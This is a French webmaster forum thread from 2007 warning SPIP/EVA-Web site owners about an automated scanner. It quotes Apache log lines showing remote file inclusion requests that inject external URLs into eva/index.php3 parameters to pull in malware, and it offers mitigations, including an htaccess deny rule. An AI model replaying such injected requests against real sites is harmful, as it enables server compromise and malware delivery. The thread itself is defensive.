Formation Google AnalyticsSavez-vous bien utiliser les outils de mesure d'audience ?
Effectuez-vous un calcul de ROI (Retour sur investissement) pour savoir comment améliorer vos campagnes emarketing ?
Savez-vous utiliser les bons outils pour booster votre taux de transformation ?
La formation Web Analytics de Ranking Metrics, présentée par un expert reconnu officiellement par Google Analytics, vous apportera les réponses à toutes vos questions !
===> Informations et inscriptions.

-> Attention, problème de sécurité avec spip /EVA
Poster un nouveau sujet Imprimer cette discussion    Forum -> Administration d'un site Web   Les dernières discussions de ce forum sont disponibles au format RSS
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
 
tofm2
WRInaute accro
WRInaute accro

Inscrit le: 09 Avr 2005
Messages: 1382
Localisation: Reuben el Arkhab
URL permanente de ce messagePosté le : Lun Juil 02, 2007 16:18    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
Bonjour

Un robot d'origine inconnue scanne actuellement les sites spip qui fonctionnent avec le squelette eva.

Ce robot est précédé d'une requete google ou autre moteur de recherche (mozbot par ex) sur
"et utilise le squelette " qui correspond au footer par défaut des dernières version de Eva web
Citation:
XX-XX-XX-220.cable.ubr08.azte.blueyonder.co.uk www;monsite.com - [02/Jul/2007:05:34:05 +0200] "GET /favicon.ico HTTP/1.1" 404 291 "http://www.mozbot.fr/search?q=%22et+utilise+le+squelette+EVA-Web%22&st=local" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
XX-XX-XX-220.cable.ubr08.azte.blueyonder.co.uk www;monsite.com - [02/Jul/2007:05:36:34 +0200] "GET /spip.php?rubrique3 HTTP/1.1" 200 6006 "http://www.mozbot.fr/search?q=%22et+utilise+le+squelette+EVA-Web%22&st=local" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

ça c'est le log apache de la recherche de faille sur mozbot
Quelque temps après, vous verrez fleurir des requetes (jusqu'à 5 fois le traffic normal du site) du type
Citation:
YYY.YYY.YYY.108 www;monsite.com - [02/Jul/2007:05:53:10 +0200] "GET /spip.php?rubrique3/eva/index.php3?perso=http://ulil.t35.com/2? HTTP/1.1" 200 19641 "-" "libwww-perl/5.65"
YYY.YYY.YYY.108 www;monsite.com - [02/Jul/2007:05:53:10 +0200] "GET /spip.php?rubrique3/eva/index.php3?aide=http://ulil.t35.com/2? HTTP/1.1" 200 19640 "-" "libwww-perl/5.65"

ou encore du genre
Citation:
bublue.dX www;monsite.com - [02/Jul/2007:16:07:40 +0200] "GET /eva/index.php3?perso=http://www.hardpornclips.com/tgp/evilx? HTTP/1.1" 403 298 "-" "libwww-perl/5.69"
bublue.dX www;monsite.com - [02/Jul/2007:16:12:48 +0200] "GET /eva/index.php3?perso=http://www.hardpornclips.com/tgp/evilx? HTTP/1.1" 403 294 "-" "libwww-perl/5.69"
(enfin celui là j'avais déjà bloqué libwww-perl -> erreur 403;voir plus bas)
évidemment, c'est pas bon, ça semble télécharger ou activer un script de daube qui fait je ne sais pas quoi de bon à distance en se référrant de votre domaine, ça sent clairement le pâté !
J'avais déjà signalé ce problème ici il y a quelques jours
http://www.webrankinfo.com/forums/viewtopic_76007.htm
cela s'était calmé depuis, mais j'ai renoté un regain d'activité aujourd'hui et cela commence à vraiment me faire ch...!
J'ai préfére par mesure de sécurité interdire simplement l'accès du site en question à toute requète de la part de useragent=libwww-perl; en attendant d'en savoir un peu plus. D'un autre côté, cela m'emm..... au plus haut point, et dans ces conditions, je sais être méchant, à bon entendeur salut

J'invite donc les utilisateurs de spip+Eva WEB à la plus grande prudence et à regarder leurs logs d'un peu plus près. Dans le doute, faites en plus disparaitre la mention "et utilise le squelette " du footer
(c'est entre les lignes 42 et 52 du fichier /squelette/inc_pied.html)
Code:
<p>
   <:copyright_spip:>
   <a href="http://www.spip.net/fr">SPIP #SPIP_VERSION</a>
   <:copyright_eva:>
   <a href="http://spip-edu.edres74.net/eva/"><:version_eva:></a>
   </p>
   <p>
   <BOUCLE_maj(RUBRIQUES){age>=0}{par date}{inverse}{0,1}>
   Dernière mise &agrave; jour : <b>[(#DATE|nom_jour)] [(#DATE|affdate)]</b>
   </BOUCLE_maj>
   </p>

tant pis pour le copyright, l'équippe développeurs de spip comprendra qu'il s'agit d'un trou de sécurité.
Bon, j'éspère ne pas en avoir trop oublié, faites passer le message.
 
tofm2 Visiter le site web du posteur
tofm2
WRInaute accro
WRInaute accro

Inscrit le: 09 Avr 2005
Messages: 1382
Localisation: Reuben el Arkhab
URL permanente de ce messagePosté le : Lun Juil 02, 2007 18:04    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
Suite de l'affaire,
le scan télécharge et execute deux malwares, dont evilx
qui d'après ZATAZ modifie les entrées de registre Windows correspondant au firewall, pour pouvoir accéder à une page web et télécharger tous types de fichiers, notamment des malwares. Bref, ça confirme ce que je pensais, c pas bon.
 
tofm2 Visiter le site web du posteur
Leonick
WRInaute accro
WRInaute accro

Inscrit le: 08 Aoû 2004
Messages: 8800
Localisation: Val de Marne
URL permanente de ce messagePosté le : Sam Juil 21, 2007 7:24    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
n'y a-t-il pas possibilité de bloquer les requêtes contenant http:// à l'intérieur ?
 
Leonick Visiter le site web du posteur
passion
WRInaute accro
WRInaute accro

Inscrit le: 06 Jan 2006
Messages: 2060
Localisation: La Rochelle
URL permanente de ce messagePosté le : Sam Juil 21, 2007 11:01    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
Je n'ai jamais utilisé ces CMS, je préfère tout à la mano!

Ce n'est pas marrant pour ces utilisateurs SPIP mais je serais heureux de montrer ce topic à mes collègues qui ne jurent que par ces genres de CMS qui vont soi-disant remplacer progressivement toutes les boites du web!

Et mon principal argument a toujours été, c'est bien les open sources mais comme le nom l'indique même login hyper sécurisé ne pourront empêcher les tentatives illicites puisqu'il suffit d'ouvrir les fichiers sources pour en chercher les failles!!

Je sais de quoi je parle puisque j'ai dû modifier des fichiers sources de SPIP afin de le personnaliser pour des clients.

Mais tout le monde ne le fait pas donc risque potentiel !
 
passion Visiter le site web du posteur
Leonick
WRInaute accro
WRInaute accro

Inscrit le: 08 Aoû 2004
Messages: 8800
Localisation: Val de Marne
URL permanente de ce messagePosté le : Mar Aoû 28, 2007 15:18    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
passion a écrit:
Je n'ai jamais utilisé ces CMS, je préfère tout à la mano!
j'ai eu ce type d'essai d'attaque sur un site qui n'utilisait aucun script CMS ou autre, mais un script perso, mais ça ne les empêche ps d'essayer. Ca renvoie évidemment des erreurs 403, (dès que j'ai un http dans l'url).
C'est pareil avec les requêtes contenant tous les noms de répertoires de scripts connus Twisted Evil
 
Leonick Visiter le site web du posteur
jidébé
WRInaute occasionnel
WRInaute occasionnel

Inscrit le: 26 Juil 2005
Messages: 123
URL permanente de ce messagePosté le : Mer Aoû 29, 2007 22:41    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
Bonsoir,

Une petite exclusivité en passant, la prochaine version de CrawlTrack (c'est pour septembre) détectera les tentatives de hacking (Cross site scripting et SQL injection).

Une petite démo (en anglais pour l'instant) ici

J'ai sur mon site entre 1000 et 1500 tentatives par jour !!!

Alors il faut vraiment être vigilant. Wink

Jean-Denis
 
jidébé Visiter le site web du posteur
tofm2
WRInaute accro
WRInaute accro

Inscrit le: 09 Avr 2005
Messages: 1382
Localisation: Reuben el Arkhab
URL permanente de ce messagePosté le : Jeu Aoû 30, 2007 13:44    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
intéressant, et bonne idée.
 
tofm2 Visiter le site web du posteur
rog
WRInaute accro
WRInaute accro

Inscrit le: 21 Sep 2006
Messages: 1662
Localisation: sapucaia do sul (RS)
URL permanente de ce messagePosté le : Ven Aoû 31, 2007 3:04    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
@leonick

c'est pas mal mais y a une multitude de façons de passer http dans l'url

rog
 
rog Visiter le site web du posteur
Leonick
WRInaute accro
WRInaute accro

Inscrit le: 08 Aoû 2004
Messages: 8800
Localisation: Val de Marne
URL permanente de ce messagePosté le : Ven Aoû 31, 2007 9:57    Sujet du message: -> Attention, problème de sécurité avec spip /EVA
rog a écrit:
@leonick

c'est pas mal mais y a une multitude de façons de passer http dans l'url

rog
et un
Code:
RewriteRule (_vti_bin|blogs|forum|search|http|shell|scanner|open|command|MSOffice|phpa|rpc|^xml|portal|community|drupal|blog|wordpress|phpgroupware|awstats|cgi-bin|web|chat|mysql|db\/|horde|mail/|/main|/read|cacti) - [NC,F,L]
Ca le fait déjà pas mal, non ?
 
Leonick Visiter le site web du posteur
 
Montrer les messages depuis:   
Revenir en haut    Forum -> Administration d'un site Web Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1 - 
Connexion
Nom d'utilisateur:    Mot de passe:      Se connecter automatiquement à chaque visite    

CLIQUEZ ICI pour vous inscrire à WebRankInfo (forum, annuaire, outils...)

Connexion

© 2001-2005 phpBB Group, support français
Personnalisation : WebRankInfo ™

 ODP  Firefox  Alsacreations  annuaire webmaster Yagoort